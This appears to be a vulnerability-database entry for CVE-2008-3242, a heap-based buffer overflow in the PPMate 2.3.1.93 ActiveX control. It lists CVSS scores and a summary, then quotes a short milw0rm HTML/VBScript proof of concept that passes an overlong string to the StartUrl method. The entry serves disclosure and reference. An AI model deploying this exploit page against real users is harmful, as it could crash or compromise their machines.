10
CVSSv2

CVE-2008-3242

Published: 21/07/2008 Updated: 29/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Heap-based buffer overflow in the PPMedia Class ActiveX control in PPMPlayer.dll in PPMate 2.3.1.93 allows remote malicious users to execute arbitrary code via a long argument to the StartUrl method. NOTE: some of these details are obtained from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

ppmate ppmedia class 2.3.1.93

Exploits

<html> <body> <object id=target classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object> <script language=vbscript> arg1=String(10000, "A") targetStartURL(arg1) </script> </body> </html> # milw0rmcom [2008-07-17] ...